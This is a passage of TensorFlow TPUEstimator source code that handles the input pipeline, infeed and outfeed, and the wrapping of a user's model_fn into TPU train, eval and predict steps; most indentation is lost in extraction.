if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
  may expect multiple `features` and `labels` tuples, one for each core.
  TPUEstimator allows various structures for inputs (namely `features`
  and `labels`). Both `features` and `labels` can be any nested structure
  supported by TF nest (namely, dict, tuples, namedtuples or any nested
  structure of such Tensors). `labels` could be `None` as well.
  These are flattened before they are passed to the infeed/outfeed library
  as that expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
    # When tf.while_loop is called, the body function, which invokes the
    # `enqueue_fn` passed in, is called to construct the graph. As a result,
    # the input_fn structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
      # Invoke the input pipeline for each core and place it on the
      # corresponding host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
      # Only calls input_fn on host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
            # user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
    # infeed_queue is used to generate dequeue ops. The only thing it uses for
    # dequeue is dtypes and shapes, so any one of them can be used. Here, grab
    # the first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
    Performs some sanity checks and logs user-friendly information. Ideally we
    should error out to give users a better error message, but if
    _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
    user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
                 'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
experimental_export_device_assignment,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
    computation: A Python function that takes `computation_inputs` and builds
      the computation graph. If `computation` returns m outputs, this function
      will return a list of m Tensors.
experimental_export_device_assignment: If `True`, use user-provided device
assignment. If `False`, round-robin computation among all TPU cores
visible to the host.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
if experimental_export_device_assignment:
return computation(computation_inputs)
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
  This makes calling model_fn on CPU and TPU easier and more consistent, and
  performs the necessary checks and mutations required by TPU training and
  evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
    all TPU shards. Besides, the input should be taken from the TPU infeed
    rather than from the input pipeline (input_fn) directly. To fit the TPU
    loop and replicate pattern, the original train computation should be
    reformed, which is the returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of train_fn, host_calls, captured scaffold_fn, and captured
      training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
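        # Optionally scale the embedding gradients before sending them back to
        # the TPU embedding engine.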
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
    For TPU evaluation, an eval (computation) step is first wrapped in a
    tf.while_loop control flow to repeat for many times and then replicated to
    all TPU shards. Besides, the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
      hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
      prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
    # TODO(xiejw): Adds validation for prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
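    # Only forward the arguments that the user's model_fn signature declares.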
kwargs = {}
    # Make deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
          err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
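      # Record dtypes and shapes so the dequeue side can build matching
      # outfeed tensors in `create_tpu_hostcall`.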
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
    across all shards. The concatenated tensors are passed to the host_fn,
    which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
    # constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
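    # Helper that runs the host_fn inside a CatchInvalidHostcallFunctions
    # context; Enter/Exit bracket the call and ExitResult registers the
    # outputs with the context.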
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
    # It is assumed that evaluation always happens on a single-host TPU system.
    # So, place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
          # TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
            # If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
    # Force all dequeue operations to be run if not consumed by the host calls.
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
